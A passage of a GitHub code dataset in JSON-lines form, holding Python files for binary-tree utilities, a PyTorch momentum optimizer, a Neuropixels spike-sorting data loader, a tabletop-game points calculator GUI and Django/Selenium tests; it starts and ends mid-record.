sub_tree['rchild'] = {}\n stack.append((right_children, sub_tree['rchild']))\n else:\n sub_tree['rchild'] = None\n\n return tree\n\n\ndef pre_in_order_to_binary_tree(pre_nodes, in_nodes):\n \"\"\"\n dict to implement a binary tree,\n nodes: list of values\n \"\"\"\n tree = {}\n stack = []\n stack.append((pre_nodes, in_nodes, tree))\n while len(stack):\n sub_pre_nodes, sub_in_nodes, sub_tree = stack.pop()\n root = sub_pre_nodes[0]\n sub_tree['value'] = root\n\n if len(sub_pre_nodes) == 1:\n # leaf node\n sub_tree['lchild'] = sub_tree['rchild'] = None\n else:\n # internal node\n # distinguish left and right sub_trees in infix nodes\n left_in_count = 0\n for node in sub_in_nodes:\n if node == root:\n break\n left_in_count += 1\n # print (left_in_count,\n # \"infix left:\", sub_in_nodes[:left_in_count],\n # \" right:\", sub_in_nodes[left_in_count+1:])\n # print (\"prefix left:\", sub_pre_nodes[1:1 + left_in_count],\n # \"right:\",sub_pre_nodes[1 + left_in_count:])\n\n # left sub_tree\n if left_in_count:\n sub_pre_left_nodes = sub_pre_nodes[1:1 + left_in_count]\n sub_in_left_nodes = sub_in_nodes[:left_in_count]\n sub_tree['lchild'] = {}\n stack.append((sub_pre_left_nodes, sub_in_left_nodes,\n sub_tree['lchild']))\n else:\n sub_tree['lchild'] = None\n\n # right sub_tree\n right_in_count = len(sub_in_nodes) - left_in_count - 1\n if right_in_count:\n sub_pre_right_nodes = sub_pre_nodes[1 + left_in_count:]\n sub_in_right_nodes = sub_in_nodes[left_in_count+1:]\n sub_tree['rchild'] = {}\n stack.append((sub_pre_right_nodes, sub_in_right_nodes,\n sub_tree['rchild']))\n else:\n sub_tree['rchild'] = None\n\n return tree\n\n\ndef post_in_order_to_binary_tree(post_nodes, in_nodes):\n \"\"\"\n dict to implement a binary tree,\n nodes: list of values\n \"\"\"\n tree = {}\n stack = []\n stack.append((post_nodes, in_nodes, tree))\n while len(stack):\n sub_post_nodes, sub_in_nodes, sub_tree = stack.pop()\n root = sub_post_nodes[-1]\n sub_tree['value'] = root\n\n if len(sub_post_nodes) == 1:\n # leaf node\n sub_tree['lchild'] = sub_tree['rchild'] = None\n else:\n # internal node\n # distinguish left and right sub_trees in infix nodes\n left_in_count = 0\n for node in sub_in_nodes:\n if node == root:\n break\n left_in_count += 1\n\n # left sub_tree\n if left_in_count:\n sub_post_left_nodes = sub_post_nodes[:left_in_count]\n sub_in_left_nodes = sub_in_nodes[:left_in_count]\n sub_tree['lchild'] = {}\n stack.append((sub_post_left_nodes, sub_in_left_nodes,\n sub_tree['lchild']))\n else:\n sub_tree['lchild'] = None\n\n # right sub_tree\n right_in_count = len(sub_in_nodes) - left_in_count - 1\n if right_in_count:\n sub_post_right_nodes = sub_post_nodes[left_in_count:-1]\n sub_in_right_nodes = sub_in_nodes[left_in_count + 1:]\n sub_tree['rchild'] = {}\n stack.append((sub_post_right_nodes, sub_in_right_nodes,\n sub_tree['rchild']))\n else:\n sub_tree['rchild'] = None\n\n return tree\n\n\ndef pre_order(tree, output=[]):\n \"\"\" value -> left -> right \"\"\"\n if not tree:\n return\n output.append(tree['value'])\n pre_order(tree['lchild'], output)\n pre_order(tree['rchild'], output)\n return output\n\n\ndef pre_order_stack(tree):\n if not tree:\n return\n\n stack = [tree, ]\n while stack:\n node = stack.pop()\n print(node['value'])\n\n if node['lchild']:\n stack.append(node['lchild'])\n if node['rchild']:\n stack.append(node['rchild'])\n\n\n\ndef post_order(tree, output=[]):\n \"\"\" left -> right -> value \"\"\"\n if not tree:\n return\n post_order(tree['lchild'], output)\n post_order(tree['rchild'], output)\n output.append(tree['value'])\n return output\n\n\ndef greedy_min_cost_traversal(tree):\n \"\"\"\n on each branch of the tree, always choose the node with smaller value.\n \"\"\"\n # greedy find the path with smaller values in each branch first\n if not tree:\n return 0\n\n greedy_cost = 0\n greedy_path = []\n sub_tree = tree\n while sub_tree:\n greedy_cost += sub_tree['value']\n greedy_path.append(sub_tree['value'])\n if sub_tree['lchild'] and sub_tree['rchild']:\n # both sub_trees exist\n if sub_tree['lchild']['value'] < sub_tree['rchild']['value']:\n sub_tree = sub_tree['lchild']\n else:\n sub_tree = sub_tree['rchild']\n elif not sub_tree['rchild']:\n # only left sub_tree exists\n sub_tree = sub_tree['lchild']\n elif not sub_tree['lchild']:\n # only right sub_tree exists\n sub_tree = sub_tree['rchild']\n\n return greedy_cost, greedy_path\n\ndef all_binary_tree_paths(tree, output=[], paths=[]):\n \"\"\"\n traversal all paths in a tree\n return list of all paths (a path is the nodes from root to leaf)\n \"\"\"\n\n if tree:\n output.append(tree['value'])\n if tree['lchild']:\n all_binary_tree_paths(tree['lchild'], output, paths)\n if tree['rchild']:\n all_binary_tree_paths(tree['rchild'], output, paths)\n elif not tree['lchild'] and not tree['rchild']:\n paths.append(output[:])\n output.pop()\n return paths","repo_name":"chenhh/Uva","sub_path":"utility/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"13766127235","text":"import torch\nfrom torch.optim.optimizer import Optimizer\n\n\nclass GradientDescentWithMomentum(Optimizer):\n def __init__(self, params, lr=0.1, decay=0.9):\n super(GradientDescentWithMomentum, self).__init__(\n params, {'lr': lr, 'decay': decay})\n for group in self.param_groups:\n for p in group['params']:\n self.state[p]['v'] = torch.zeros_like(p)\n\n @torch.no_grad()\n def step(self):\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is not None:\n state = self.state[p]\n state['v'].mul_(group['decay']).add_(\n p.grad, alpha=-group['lr'])\n p.add_(state['v'])\n","repo_name":"vitaminac/miniai","sub_path":"miniai/opt/momentum.py","file_name":"momentum.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9794906959","text":"## This function divides the rectangle into fewest number of squares.\n\ndef sqInRect(lng,wdth):\n if lng==wdth:\n return None\n else:\n dimensions=[]\n area=lng*wdth\n intSqRoot=int((area)**0.5)\n rectSide=sorted(range(1,intSqRoot+1),reverse=True)\n for sqSide in rectSide:\n while area>=sqSide**2:\n dimensions.append(sqSide)\n area-=sqSide**2\n return dimensions\n\nprint(sqInRect(5,3))\n","repo_name":"abiswas20/codewars_code","sub_path":"cutTrueRectangleIntoSquares.py","file_name":"cutTrueRectangleIntoSquares.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8223102381","text":"__author__ = \"mfreer\"\n__date__ = \"2011-09-15 17:09\"\n__version__ = \"1.6\"\n__all__ = [\"FileCore\", \"get_file_list\"]\n\nimport glob\nimport logging\n\nclass FileCore(object):\n \"\"\"\n Abstract class which holds basic file access methods and attributes.\n Designed to be subclassed by NetCDF, NASA Ames and basic text file\n classes.\n\n **Constructor Variables**\n \n :param string filename: Optional -\n Name of file to open.\n :param char perms: Optional -\n Permissions used to open file. Options are ``w`` for write (overwrites data in file),\n ``a`` and ``r+`` for append, and ``r`` for read. ``r`` is the default value\n \"\"\"\n\n def __init__(self, filename=None, perms='r', **kwargs):\n \"\"\"\n Initializes file instance.\n\n :param string filename: Optional -\n Name of file to open.\n :param char perms: Optional -\n Permissions used to open file. Options are ``w`` for write (overwrites data in file),\n ``a`` and ``r+`` for append, and ``r`` for read. ``r`` is the default value\n \"\"\"\n\n logging.debug('egads - input_core.py - FileCore - __init__ - filename ' + str(filename) + \n ', perms ' + perms + ', kwargs ' + str(kwargs))\n self.f = None\n self.filename = filename\n self.perms = perms\n for key, val in kwargs.iteritems():\n setattr(self, key, val)\n if filename is not None:\n self._open_file(filename, perms)\n\n def open(self, filename, perms=None):\n \"\"\"\n Opens file given filename.\n\n :param string filename:\n Name of file to open.\n :param char perms: Optional -\n Permissions used to open file. Options are ``w`` for write (overwrites data in file),\n ``a`` and ``r+`` for append, and ``r`` for read. ``r`` is the default value\n \"\"\"\n\n logging.debug('egads - input_core.py - FileCore - open - filename ' + str(filename) + ', perms ' + str(perms))\n if perms is not None:\n self.perms = perms\n else:\n perms = self.perms\n self._open_file(filename, perms)\n\n def close(self):\n \"\"\"\n Close opened file.\n \"\"\"\n \n logging.debug('egads - input_core.py - FileCore - close - filename ' + str(self.filename))\n if self.f is not None:\n self.f.close()\n self.f = None\n self.filename = None\n\n def get_perms(self):\n \"\"\"\n Returns the current permissions on the file that is open. Returns None if\n no file is currently open. Options are ``w`` for write (overwrites\n data in file),``a`` and ``r+`` for append, and ``r`` for read.\n \"\"\"\n \n logging.debug('egads - input_core.py - FileCore - get_perms - perms ' + str(self.perms))\n if self.f is not None:\n return self.perms\n else:\n return\n\n def get_filename(self):\n \"\"\"\n If file is open, returns the filename.\n \"\"\"\n \n logging.debug('egads - input_core.py - FileCore - get_filename - filename ' + str(self.filename))\n return self.filename\n\n logging.info('egads - input_core.py - FileCore has been loaded')\n\ndef get_file_list(path):\n \"\"\"\n Given path, returns a list of all files in that path. Wildcards are supported.\n\n Example::\n \n file_list = get_file_list('data/*.nc')\n \"\"\"\n\n logging.debug('egads - input_core.py - get_file_list - path ' + str(path))\n return glob.glob(path)\n\n","repo_name":"EUFAR/egads","sub_path":"egads/input/input_core.py","file_name":"input_core.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"17947882808","text":"# This code loads Neuropixels data acquired by SpikeGLX and processed by:\n# CatGT, Kilosort, Tprime, CWaves, and associated postprocessing from https://github.com/jenniferColonell/ecephys_spike_sorting\n# Data is packaged into a numpy object providing convenient access to spike times, event times, and relevant cluster metrics\n\nimport numpy as np\nimport os\nimport sys\nimport glob\nimport pandas as pd\nimport pickle\nimport scipy\nfrom joblib import Parallel, delayed\n\nimport lfp\nimport sglx_util\n\n\nclass MultiprobeData(object):\n \"\"\"\n Class used to load all the sorting results from a single experiment. \n This assumes that Tprime has already been run and aligned event times are available. \n \"\"\"\n def __init__(self, mouse, date, load_waveforms=False, load_lfp=True, qc='bombcell'):\n self._expts = [] # list of probe paths\n self._ncell = 0\n self._spike_times = None # Nspikes x 1\n self._clusts = None # Nspikes x 1\n self._clust_id = None # Nclust x 1 IDs of each cluster (in order)\n self._clust_depths = None\n self._clust_amps = None\n self._probe_id = None # Nclust x 1 which probe each cluster came from\n self._tract_names = []\n self._chan_map = []\n self._chan_pos = []\n self._templates = []\n self._winv = []\n self._mean_waveforms = None\n self._ntemplates = 0\n self._spike_templates = []\n self._mouse = mouse\n self._date = date\n\n self._lfp = []\n self._lfp_fs = []\n self._lfp_chans = []\n self._lfp_probe_ids = []\n\n self._load_lfp = load_lfp\n self._load_waveforms = load_waveforms\n self._qc = qc\n # experiment-specific event info\n self._events = None\n\n def add_experiment(self, probe_path, tract_name):\n # Add probe paths\n self._expts.append(probe_path)\n self._tract_names.append(tract_name)\n\n def add_events(self, data_path, event_map):\n # Customize based on recorded events on the Nidaq\n # Assume already aligned using Tprime\n # data_path: path to folder containing Tprime output\n # event_map: name of events corresponding to nidaq channels\n # note that the key in event_map should unambiguously match substring in the tprime output file name.\n # For example: {'XA_2': 'trial', 'XA_3': 'stim'}\n events = {}\n for k,v in event_map.items():\n path = glob.glob(os.path.join(data_path, f\"*{k}*\"))[0]\n events[v] = np.loadtxt(path)\n self._events = events\n\n\n def combine_experiments(self, ref_expt_idx=0, clust_offset=10000):\n \"\"\"\n Inputs:\n ref_expt_idx: experiment index to use as reference\n clust_offset: maximum number of possible clusters in each experiment, to uniquely identify clusters\n \"\"\"\n for i, probe_path in enumerate(self._expts):\n expt = EPhyClusts(self._expts[i], self._load_waveforms, load_lfp=self._load_lfp, qc=self._qc)\n self._chan_map.append(expt._chan_map)\n self._chan_pos.append(expt._chan_pos)\n self._winv.append(expt._winv)\n self._templates.append(expt._templates)\n self._spike_templates.append(expt._spike_templates)\n self._ntemplates += expt._ntemplates\n self._ncell += len(expt._metrics[expt._metrics[\"noise\"]==0])\n #self._amplitudes.append(expt._amplitudes)\n if self._load_waveforms:\n if i == 0:\n self._mean_waveforms = expt._mean_waveforms\n else:\n self._mean_waveforms = np.concatenate([self._mean_waveforms, expt._mean_waveforms])\n \n old_clust_ids = expt._metrics[\"cluster_id\"] # id numbers\n old_clusts = expt._clusts # spikes tagged by id\n new_clusts = old_clusts.copy()\n new_clust_ids = old_clust_ids + clust_offset*i\n expt._metrics[\"n_spikes\"] = np.unique(old_clusts, return_counts=True)[1]\n # Performant relabeling of the spikes\n reid_dict = dict(zip(old_clust_ids, new_clust_ids))\n replace = np.array([list(reid_dict.keys()), list(reid_dict.values())])\n new_clusts = replace[1, np.searchsorted(replace[0, :], old_clusts)]\n expt._metrics[\"cluster_id\"] = new_clust_ids\n\n if i == 0:\n self._clust_depths = expt._clust_depths\n self._clust_xpos = expt._clust_xpos\n self._probe_id = np.zeros(len(expt._clust_id),dtype=np.int)\n self._spike_times = expt._spike_times\n self._clust_id = new_clust_ids\n self._clusts = new_clusts\n self._metrics = expt._metrics\n if self._load_lfp:\n self._lfp.append(expt._lfp)\n self._lfp_fs.append(expt._lfp_fs)\n self._lfp_chans = expt._lfp_chans\n self._lfp_probe_ids = i*np.ones(len(expt._lfp_chans), dtype=np.int)\n else:\n self._clust_depths = np.concatenate([self._clust_depths, expt._clust_depths])\n self._clust_xpos = np.concatenate([self._clust_xpos, expt._clust_xpos])\n self._probe_id = np.concatenate([self._probe_id, i*np.ones(len(expt._clust_id), dtype=np.int)])\n self._spike_times = np.concatenate([self._spike_times, expt._spike_times])\n self._clust_id = np.concatenate([self._clust_id, new_clust_ids])\n self._clusts = np.concatenate([self._clusts, new_clusts])\n self._metrics = pd.concat([self._metrics, expt._metrics], ignore_index=True)\n if self._load_lfp:\n self._lfp.append(expt._lfp)\n self._lfp_fs.append(expt._lfp_fs)\n self._lfp_chans = np.concatenate([self._lfp_chans, expt._lfp_chans])\n self._lfp_probe_ids = np.concatenate([self._lfp_probe_ids, i*np.ones(len(expt._lfp_chans), dtype=np.int)])\n \n print(\"Sorting spike times\")\n sort_idx = np.argsort(self._spike_times)\n \n self._clusts = self._clusts[sort_idx]\n self._spike_times = self._spike_times[sort_idx]\n\n if self._load_lfp:\n self._lfp, self._lfp_fs = self.rescale_lfps(self._lfp, self._lfp_fs)\n\n \n def save_data(self, out_path):\n with open(out_path, 'wb') as f:\n pickle.dump(self,f)\n\n def save_units_npz(out_path, self):\n np.savez(out_path, spike_times=self._spike_times, clusts=self._clusts,\n clust_id=self._clust_id, clust_depths=self._clust_depths,\n probe_id=self._probe_id, metrics=self._metrics,\n events=self._events, mouse_name=self._mouse_name, unit_locs=self._unit_locs,\n chan_locs=self._chan_locs, chan_probe_id=self._chan_probe_id)\n\n def load_units_npz(self, fpath):\n d = np.load(fpath)\n self._spike_times = d['spike_times']\n self._clusts = d['clusts']\n self._clust_id = d['clust_id']\n self._clust_depths = d['clust_depths']\n self._probe_id = d['probe_id']\n self._metrics = d['metrics']\n self._events = d['events']\n self._mouse_name = d['mouse_name']\n self._unit_locs = d['unit_locs']\n self._chan_locs = d['chan_locs']\n self._chan_probe_id = d['chan_probe_id']\n\n def rescale_lfps(self, lfps, sample_rates):\n \"\"\"\n Take in a list of LFP data and a list of sample rates.\n Resize LFP data in time dimension to slowest sampling rate.\n Return the scaled LFPs and the new (minimum) sampling rate\n \"\"\"\n min_fs_ix = np.argmin(sample_rates)\n min_fs = sample_rates[min_fs_ix]\n zoom_factors = [(min_fs/fs,1) for fs in sample_rates]\n\n scaled_lfps = Parallel(n_jobs=-1)(delayed(scipy.ndimage.zoom)(lfps[i], zoom_factors[i], order=1) for i in range(len(sample_rates)))\n shapes = np.array([l.shape[0] for l in scaled_lfps])\n scaled_lfps = [l[:np.min(shapes),:] for l in scaled_lfps]\n scaled_lfps = np.concatenate(scaled_lfps, axis=1)\n return scaled_lfps, min_fs\n\nclass EPhyClusts(object):\n \"\"\"\n Class to load the results of a KiloSort + Phy + Quality Scoring + CWaves for a single probe. \n\n This class is used to process condense the Phy output into a single npy file.\n \"\"\"\n\n def __init__(self, dirname, load_waveforms=False, load_lfp=True, qc='bombcell'):\n \"\"\"\n :input dirname: name of kilosort output directory with Phy data\n :input load_waveforms: whether to load the waveforms for each cluster.\n :input load_lfp: whether to load the downsampled LFP data for this probe.\n :input qc: whether to use the bombcell unittype file ('bombcell') or the kilosort unit type file ('ks')\n\n.\n \"\"\"\n vals = {}\n # load params from python file\n print(\"Loading ephys variables\")\n with open(os.path.join(dirname, \"params.py\")) as f:\n for line in f:\n fields = line.rstrip().split(\" \")\n vals[fields[0]] = fields[2]\n self._dirname = dirname\n self._dat_path = vals['dat_path'][1:-1] # to unquote\n self._n_channels_dat = vals['n_channels_dat']\n self._dtype = vals['dtype']\n self._offset = vals['offset']\n #self._sample_rate = float(vals['sample_rate'])\n self._hp_filtered = vals['hp_filtered']\n\n # load all variables\n self._chan_map = np.load(os.path.join(dirname, \"channel_map.npy\")) # active channels\n self._chan_pos = np.load(os.path.join(dirname, \"channel_positions.npy\")) # channel positions in um \n self._spike_times = np.load(os.path.join(dirname, \"spike_times_sec_adj.npy\")).flatten() # time adjusted spikes in seconds\n if load_waveforms:\n self._mean_waveforms = np.load(os.path.join(dirname, \"mean_waveforms.npy\")) # average waveforms for each cluster. this is hundreds of MBs\n else:\n self._mean_waveforms = None\n \n self._clusts = np.load(os.path.join(dirname, \"spike_clusters.npy\")).flatten() # cluster for each spike\n self._spike_templates = np.load(os.path.join(dirname, \"spike_templates.npy\")).flatten()\n self._templates = np.load(os.path.join(dirname, \"templates.npy\")) # the whitened template waveforms [nTemplates x nTimesPoints x nChannels]\n self._ntemplates = self._templates.shape[0]\n self._winv = np.load(os.path.join(dirname, \"whitening_mat_inv.npy\")) # used to unwhiten templates into raw data space\n\n if os.path.exists(os.path.join(dirname, \"cluster_info.tsv\")):\n self._metrics = pd.read_csv(os.path.join(dirname, \"cluster_info.tsv\"), sep=\"\\t\")\n else:\n self._metrics = pd.read_csv(os.path.join(dirname, \"metrics.csv\"))\n self._good, self._noise, self._mua = self._load_cluster_types(dirname, qc=qc)\n self._metrics[\"noise\"] = np.zeros_like(self._metrics[\"cluster_id\"])\n self._metrics[\"good\"] = np.zeros_like(self._metrics[\"cluster_id\"])\n self._metrics[\"mua\"] = np.zeros_like(self._metrics[\"cluster_id\"])\n self._metrics.loc[self._metrics[\"cluster_id\"].isin(self._noise), \"noise\"] = 1\n self._metrics.loc[self._metrics[\"cluster_id\"].isin(self._good), \"good\"] = 1\n self._metrics.loc[self._metrics[\"cluster_id\"].isin(self._mua), \"mua\"] = 1\n self._clust_id = np.unique(self._metrics[\"cluster_id\"])\n self._clust_depths = self._chan_pos[self._metrics[\"peak_channel\"][np.argsort(self._metrics[\"cluster_id\"])]][:,1]\n self._clust_xpos = self._chan_pos[self._metrics[\"peak_channel\"][np.argsort(self._metrics[\"cluster_id\"])]][:,0]\n \n if load_lfp:\n self._lfp, self._lfp_chans, self._lfp_fs = self.load_downsampled_lfp(dirname)\n else:\n self._lfp, self._lfp_chans, self._lfp_fs = (None, None, None)\n\n def load_downsampled_lfp(self, dirname, temporal_downsample=10, spatial_downsample=4):\n \"\"\"\n Load and downsample LFP for a given probe.\n \"\"\"\n parent_dir = os.path.dirname(dirname)\n lf_fn = glob.glob(os.path.join(parent_dir, f\"*imec*.lf.bin\"))[0]\n chanmap_fn = glob.glob(os.path.join(parent_dir, \"*chanMap.mat\"))[0]\n connected = np.squeeze(scipy.io.loadmat(chanmap_fn)[\"connected\"])\n lfp_data = sglx_util.Reader(lf_fn)\n fs = lfp_data.fs\n # subsample LFP data spatially and temporally -- take every 4th channel, every 10 samples\n lfp_sub = lfp.subsample_lfp(lfp_data._raw, np.arange(384)[connected.astype('bool')][::spatial_downsample], temporal_downsample)\n chan_ix = np.arange(np.sum(connected))[::spatial_downsample]\n lfp_data.close()\n return lfp_sub, chan_ix, fs/temporal_downsample\n \n def _load_cluster_types(self, dirname, qc='bombcell'):\n noise = []\n good = []\n mua = []\n if qc == 'bombcell':\n fname = os.path.join(dirname, \"cluster_bc_unitType.tsv\")\n if not os.path.exists(fname):\n raise ValueError('No bombcell qc file!')\n with open(fname) as f:\n for l in f:\n fields = l.rstrip().split(\"\\t\")\n if fields[0] == \"cluster_id\":\n pass\n else:\n cluster_id = int(fields[0])\n cluster_type = fields[1]\n if cluster_type == \"GOOD\":\n good.append(cluster_id)\n elif (cluster_type == \"MUA\") or (cluster_type == \"NON-SOMA\"):\n mua.append(cluster_id)\n elif cluster_type == \"NOISE\":\n noise.append(cluster_id)\n\n else:\n fname = os.path.join(dirname, \"cluster_group.tsv\")\n with open(fname) as f:\n for l in f:\n fields = l.rstrip().split(\"\\t\")\n if fields[0] == \"cluster_id\":\n pass\n else:\n cluster_id = int(fields[0])\n cluster_type = fields[1]\n if cluster_type == \"good\":\n good.append(cluster_id)\n elif cluster_type == \"mua\":\n mua.append(cluster_id)\n elif cluster_type == \"noise\":\n noise.append(cluster_id)\n return np.array(good), np.array(noise), np.array(mua)","repo_name":"erichamc/brainwide-npix","sub_path":"bwnpix/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":14569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"11553803806","text":"import PySimpleGUI as sg\nimport json\n\n\ndat = 0\nwith open(\"points.json\", \"r\") as F:\n dat = json.load(F)\n\n\nfactions = []\nfor faction in dat:\n factions.append(faction)\n\nsg.theme('DarkAmber') # Keep things interesting for your users\n\n# Initial window\nlayout = [[sg.Text('Points Calculator',key=\"TITLE_TEXT\")], \n [sg.DropDown(values=factions, size=(20, 12), key='FACTION', readonly=True)],\n [sg.Button('Load Faction'), sg.Exit()]] \nwindow = sg.Window('40K Points', layout) \nHEIGHT=1\nFACTION = \"\"\nwhile True: # The Event Loop\n event, values = window.read() \n print(event, values)\n \n if event == 'Load Faction':\n factionLayout = [[sg.Text('Points Calculator',key=\"TITLE_TEXT\")], \n [sg.DropDown(values=factions, size=(20, 12), key='FACTION', readonly=True)],\n [sg.Button('Load Faction'), sg.Exit()],\n [sg.Text(\"Total: 0\", key=\"FACTION_TOTAL\")]\n ] \n FACTION = values[\"FACTION\"]\n for unit in dat[values[\"FACTION\"]]:\n # Create model count array\n if 'count' not in dat[values[\"FACTION\"]][unit]:\n dat[values[\"FACTION\"]][unit]['count'] = 0 \n \n # create a row \n row = [sg.Text(unit + \" x\" + str(dat[values[\"FACTION\"]][unit]['models']), size=(20, HEIGHT)),\n sg.Text(str(dat[values[\"FACTION\"]][unit]['points']),size=(10, HEIGHT) ),\n sg.Button('-',size=(2, 1),key=unit+\"-\"),\n sg.Button('+',size=(2, 1),key=unit+\"+\"),\n sg.Text('x' + str(dat[values[\"FACTION\"]][unit]['models'] * dat[values[\"FACTION\"]][unit]['count']) + ' = ' + str(dat[values[\"FACTION\"]][unit]['points'] * dat[values[\"FACTION\"]][unit]['count']),size=(20, HEIGHT), key=unit+str(\"TOTAL\"))]\n factionLayout.append(row)\n\n \n window.close()\n window = sg.Window('Window that stays open', factionLayout) \n elif event == sg.WIN_CLOSED or event == 'Exit':\n break \n\n else:\n if event[len(event)-1] == \"+\":\n dat[FACTION][event[0:len(event)-1]]['count'] += 1\n elif event[len(event)-1] == \"-\":\n dat[FACTION][event[0:len(event)-1]]['count'] -= 1\n if dat[FACTION][event[0:len(event)-1]]['count'] < 0:\n dat[FACTION][event[0:len(event)-1]]['count'] = 0\n\n window[event[0:len(event)-1]+str(\"TOTAL\")].update(\n'x' + str(dat[FACTION][event[0:len(event)-1]]['models'] * dat[FACTION][event[0:len(event)-1]]['count']) + ' = ' + str(dat[FACTION][event[0:len(event)-1]]['points'] * dat[FACTION][event[0:len(event)-1]]['count'])\n)\n FACTION_TOTAL=0\n for unit in dat[FACTION]:\n FACTION_TOTAL += dat[FACTION][unit]['count'] * dat[FACTION][unit]['points']\n window[\"FACTION_TOTAL\"].update(\"Total: \" + str(FACTION_TOTAL))\n\n\nwindow.close()\n","repo_name":"jmtoniolo/40K_Points","sub_path":"point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7205757829","text":"from urllib import response\nfrom django.urls import reverse, resolve\nfrom django.test import TestCase, SimpleTestCase, Client\nfrom ventas.views import ProductosView\nfrom ventas.models import Producto\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom rest_framework.test import APIClient\nfrom django.contrib.auth.models import User\nfrom api.models import Libro\nfrom api.serializers import LibroSerializer\nimport os\n\nclass TestIntegracion(TestCase):\n def setUp(self):\n self.client = APIClient()\n self.user = User.objects.create_user(username=\"admin\",password=\"admin\")\n self.client.force_authenticate(user=self.user)\n\n def test_get_libros(self):\n Libro.objects.create(nombre_libro=\"Libro 1\", autor=\"Autor 1\", editorial=\"Editorial 1\")\n Libro.objects.create(nombre_libro=\"Libro 2\", autor=\"Autor 2\", editorial=\"Editorial 2\")\n\n response = self.client.get('/libros/')\n\n\n self.assertEqual(response.status_code, 200)\n\n libros = Libro.objects.filter(activo=True)\n serializer = LibroSerializer(libros, many=True)\n \n self.assertEqual(serializer.data, response.data)\n\n def test_post_libro(self):\n data = {\n \"nombre_libro\": \"Libro 3\", \n \"autor\": \"Autor 3\",\n \"editorial\": \"Editorial 3\",\n \"activo\": False\n }\n \n #Pruebas internas del endpoint /libros/ POST\n response = self.client.post(\"/libros/\", data, format=\"json\")\n self.assertEqual(response.status_code, 201)\n data.pop(\"activo\")\n self.assertEqual(response.data, data)\n\n #Prueba de integración con base de datos\n libro_creado = Libro.objects.get(nombre_libro=\"Libro 3\")\n self.assertEqual(libro_creado.autor, data['autor'])\n self.assertEqual(libro_creado.editorial, data['editorial'])\n\n #Prueba de integración con /libros/ GET\n libro_nuevo = self.client.get('/libros/')\n self.assertNotIn(response.data, libro_nuevo.data)\n \n\nclass FunctionalTest(TestCase):\n def test_login_wrong_data(self):\n driver = webdriver.Chrome()\n driver.get(\"http://localhost:8000/login\")\n driver.maximize_window()\n\n wait = WebDriverWait(driver, 10)\n time.sleep(2)\n \n\n input_user = driver.find_element(By.ID,\"id_usuario\")\n input_password = driver.find_element(By.ID,\"id_password\")\n\n input_user.send_keys('a')\n time.sleep(2)\n input_password.send_keys('a')\n time.sleep(2)\n boton_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div/div/div/form/div[6]/button')))\n boton_iniciar_sesion.click()\n time.sleep(2)\n\n danger_alert = driver.find_element(By.XPATH,\"/html/body/div/div/div/form/div[4]/small\")\n time.sleep(2)\n\n self.assertEqual(danger_alert.text, \"Usuario inválido\")\n\n \n\n def test_open_local_project(self):\n driver = webdriver.Chrome()\n driver.get(\"http://localhost:8000/\")\n driver.maximize_window()\n driver.implicitly_wait(5)\n\n wait = WebDriverWait(driver, 10)\n time.sleep(2)\n nav_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"navbarNav\"]/ul/li[2]/a')))\n nav_iniciar_sesion.click()\n\n input_user = driver.find_element(By.ID,\"id_usuario\")\n input_password = driver.find_element(By.ID,\"id_password\")\n\n input_user.send_keys('Daniel')\n time.sleep(2)\n input_password.send_keys('admin')\n time.sleep(2)\n boton_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div/div/div/form/div[6]/button')))\n boton_iniciar_sesion.click()\n \n nav_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"navbarNav\"]/ul/li[2]/a')))\n nav_iniciar_sesion.click()\n\n nav_productos = wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"navbarNav\"]/ul[1]/li[2]/a')))\n nav_productos.click()\n html = driver.find_element(By.TAG_NAME, 'html')\n html.send_keys(Keys.END)\n time.sleep(2)\n input_nombre = driver.find_element(By.ID,\"id_nombre\")\n input_descripcion = driver.find_element(By.ID,\"id_descripcion\")\n input_precio = driver.find_element(By.ID,\"id_precio\")\n input_archivo = driver.find_element(By.ID,\"id_archivos\")\n\n tbody = driver.find_element(By.XPATH,'//*[@id=\"tabla\"]/tbody')\n filas = tbody.find_elements(By.TAG_NAME,'tr')\n print(len(filas))\n\n time.sleep(2)\n input_nombre.send_keys(\"Celular Samsung Galaxy\")\n time.sleep(2)\n input_descripcion.send_keys(\"Más pantalla, más espacio para jugar. Disfruta cualquier detalle con su pantalla de 6.6” 90Hz. La batería te durará casi 2 días (dependiendo el uso del dispositivo) y tiene una recarga ultra rápida de 25W. Toma selfies 1.6 x más claras y captura cada detalle con su triple cámara de 50MP. Navega rápidamente con la red 5G y el poderoso procesador 4.0 x Single y 1.8 x Multi. Comparte lo que necesites con Quick Share y obtén\")\n time.sleep(2)\n input_precio.send_keys(\"2799\")\n time.sleep(2)\n input_archivo.send_keys(os.path.abspath('test.txt'))\n time.sleep(2)\n guardar_producto = wait.until(EC.presence_of_element_located((By.ID,\"boton_guardar\")))\n guardar_producto.click()\n time.sleep(2)\n tbody = driver.find_element(By.XPATH,'//*[@id=\"tabla\"]/tbody')\n filas_despues = tbody.find_elements(By.TAG_NAME,'tr')\n print(len(filas_despues))\n time.sleep(6)\n self.assertNotEqual(len(filas), len(filas_despues))\n\n\ndef suma(a, b):\n return a + b\n\n\n\nclass TestUnitarioVentas(TestCase):\n def 